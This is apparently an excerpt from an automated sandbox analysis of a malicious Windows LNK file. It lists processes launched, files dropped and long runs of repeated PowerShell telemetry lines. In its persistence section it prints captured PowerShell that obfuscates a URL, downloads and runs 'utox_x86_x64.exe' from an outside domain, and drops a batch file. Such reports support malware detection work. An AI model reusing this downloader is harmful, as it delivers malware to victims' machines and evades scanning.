Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FB710 push rbp; retf	4_2_00007FF63D3FB713
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FB720 push rbp; retf	4_2_00007FF63D3FB723
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FB718 push rbp; retf	4_2_00007FF63D3FB71B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D272CF0 push rbp; retf	4_2_00007FF63D3FBB23
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB4B27D2A5 pushad ; iretd	5_2_00007FFB4B27D2A6
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C48BE push eax; retf	9_3_028C48BF
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C4EB2 pushad ; retf	9_3_028C4EB3
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C5ED9 push esi; ret	9_3_028C5EDD
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C62E3 push ebx; ret	9_3_028C62E6
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C40F7 push eax; ret	9_3_028C40FB
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C220B push eax; iretd	9_3_028C2224
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C6C12 push edx; retf	9_3_028C6C26
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C4427 pushad ; ret	9_3_028C4428
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C5643 push eax; retf	9_3_028C5645
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C1865 push cs; ret	9_3_028C18C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C17D5 push cs; ret	9_3_028C18C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C35EC push esi; ret	9_3_028C35ED
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C59E3 push esi; retf	9_3_028C59E6
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C430B push eax; retf	9_3_028C430C
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_028C48BE push eax; retf	9_2_028C48BF

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\regsvr32.exe

Source: C:\Windows\System32\rekeywiz.exe	File created: C:\Users\user\AppData\Roaming\Gga6.ini	Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat	File created: C:\Users\user\AppData\Roaming\M08e.ini	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\utox_x86_x64.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\ajbs50ul.bat	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\ajbs50ul.bat

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\ajbs50ul.bat	Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat	File created: C:\Users\user\AppData\Roaming\M08e.ini	Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe	File created: C:\Users\user\AppData\Roaming\Gga6.ini	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\ajbs50ul.bat

Jump to dropped file

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit[Environment]::GetEnvironmentVariable('public') + '\\ajbs50ul.bat'(New-Object System.Net.WebClient).DownloadFile($oulv.Replace('v7i9','tps://').Replace('p24', 'e'), $fz)start $fz@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
